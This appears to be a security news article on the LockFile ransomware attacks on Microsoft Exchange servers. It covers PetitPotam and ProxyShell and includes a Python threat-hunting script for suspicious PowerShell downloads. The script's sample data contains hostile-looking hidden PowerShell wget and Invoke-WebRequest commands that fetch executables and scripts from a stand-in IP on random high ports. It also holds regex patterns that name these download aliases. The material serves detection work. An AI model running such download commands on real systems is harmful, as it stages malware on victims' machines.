Security researchers claim to have discovered a new ransomware family called LockFile that may have been used to attack Microsoft Exchange servers in the US and Asia. The LockFile ransomware was first observed on the network of a US financial organisation on July 20, with its latest activity seen as recently as August 20.
Symantec says it has seen the ransomware hit at least 10 companies within a single month. According to the company, the attackers used the incompletely patched PetitPotam vulnerability (an NTLM relay weakness) to take over the domain controller and then spread across the network. It is not yet clear how the attackers gained initial access to the Microsoft Exchange servers.
Attack Chain
The Exchange servers are compromised through an as yet unidentified technique that results in a PowerShell command being executed. Other PowerShell wget commands to the same IP address use similarly random-looking high port numbers (in PowerShell, wget is a built-in alias for Invoke-WebRequest, so the downloads may not stand out in command-line telemetry unless you look for the aliases as well). Exactly what the PowerShell command downloads is unknown; what is clear is that the attackers maintain access to victim networks for at least several days before launching the ransomware.
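As an added example (not from Symantec's write-up or the original article), the following Python hunts process-creation command lines for the pattern described above: PowerShell invoking wget or its Invoke-WebRequest equivalents against one destination on several non-standard high ports. The sample records, the 203.0.113.10 address, the 1024 port threshold and the w3wp.exe parent-process check are constructed assumptions for illustration, not indicators from the incident.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (host, parent image, command line).
# These are illustrative, not telemetry from the LockFile intrusions.
SAMPLE_EVENTS = [
    ("EXCH01", "w3wp.exe",
     'powershell.exe -nop -w hidden -c "wget http://203.0.113.10:49812/a -OutFile C:\\Windows\\Temp\\a.exe"'),
    ("EXCH01", "w3wp.exe",
     'powershell -c "Invoke-WebRequest http://203.0.113.10:58023/b -o C:\\Windows\\Temp\\b.bin"'),
    ("DC01", "services.exe",
     'powershell.exe -c "iwr http://203.0.113.10:61337/c.ps1 -UseBasicParsing"'),
    ("WS07", "explorer.exe",
     'powershell.exe -c "wget https://www.example.com/update.ps1 -OutFile u.ps1"'),
    ("WS07", "explorer.exe", "notepad.exe C:\\Users\\u\\notes.txt"),
]

POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# wget, curl, iwr and irm are built-in PowerShell aliases for Invoke-WebRequest / Invoke-RestMethod.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b", re.I)
URL_RE = re.compile(r'''(?P<scheme>https?)://(?P<host>[^\s:/"']+)(?::(?P<port>\d{1,5}))?''', re.I)

HIGH_PORT = 1024  # assumption: anything above the well-known range counts as a "high" port
# Assumption, not from the article: w3wp.exe (the IIS worker hosting Exchange's web endpoints)
# should not normally spawn PowerShell, so treat it as a suspicious parent.
SUSPICIOUS_PARENTS = {"w3wp.exe"}


def url_port(match):
    """Explicit port if given, otherwise the scheme default."""
    if match.group("port"):
        return int(match.group("port"))
    return 443 if match.group("scheme").lower() == "https" else 80


def extract_downloads(events):
    """Return one finding per URL in a PowerShell command line that downloads over HTTP(S)."""
    findings = []
    for host, parent, cmd in events:
        if not (POWERSHELL_RE.search(cmd) and DOWNLOAD_RE.search(cmd)):
            continue
        for m in URL_RE.finditer(cmd):
            port = url_port(m)
            findings.append({
                "host": host,
                "parent": parent,
                "dest": m.group("host"),
                "port": port,
                "high_port": port > HIGH_PORT,
                "suspicious_parent": parent.lower() in SUSPICIOUS_PARENTS,
            })
    return findings


def group_by_destination(findings):
    """Map each download destination to the sorted list of ports seen, across all hosts."""
    ports = defaultdict(set)
    for f in findings:
        ports[f["dest"]].add(f["port"])
    return {dest: sorted(p) for dest, p in ports.items()}


def flag_destinations(findings, min_hosts=1):
    """Destinations contacted on more than one distinct high port by at least min_hosts hosts."""
    by_dest = defaultdict(lambda: {"ports": set(), "hosts": set()})
    for f in findings:
        if f["high_port"]:
            by_dest[f["dest"]]["ports"].add(f["port"])
            by_dest[f["dest"]]["hosts"].add(f["host"])
    return sorted(d for d, v in by_dest.items()
                  if len(v["ports"]) > 1 and len(v["hosts"]) >= min_hosts)


if __name__ == "__main__":
    found = extract_downloads(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']:7} parent={f['parent']:13} {f['dest']}:{f['port']}"
              f" high_port={f['high_port']} suspicious_parent={f['suspicious_parent']}")
    print("ports per destination:", group_by_destination(found))
    print("destinations with several high ports:", flag_destinations(found))
```

In practice the records would come from Sysmon Event ID 1 or Security Event 4688 command lines. The point of grouping by destination rather than judging each command alone is that a single PowerShell download to one odd port is easy to dismiss, while the same address reappearing on several random high ports from an Exchange server and a domain controller is the shape of activity the write-up describes.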
As the US Cybersecurity and Infrastructure Security Agency (CISA) put it: “Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organisations to identify vulnerable systems on their networks and immediately apply Microsoft’s Security Update from May 2021—which remediates all three ProxyShell vulnerabilities.”
LockFile appears to be a new entrant in an already crowded ransomware landscape. Investigation into the threat, including whether it has links to any previously seen or retired ransomware families, continues. Symantec has also listed file-based and network-based protections for the threat.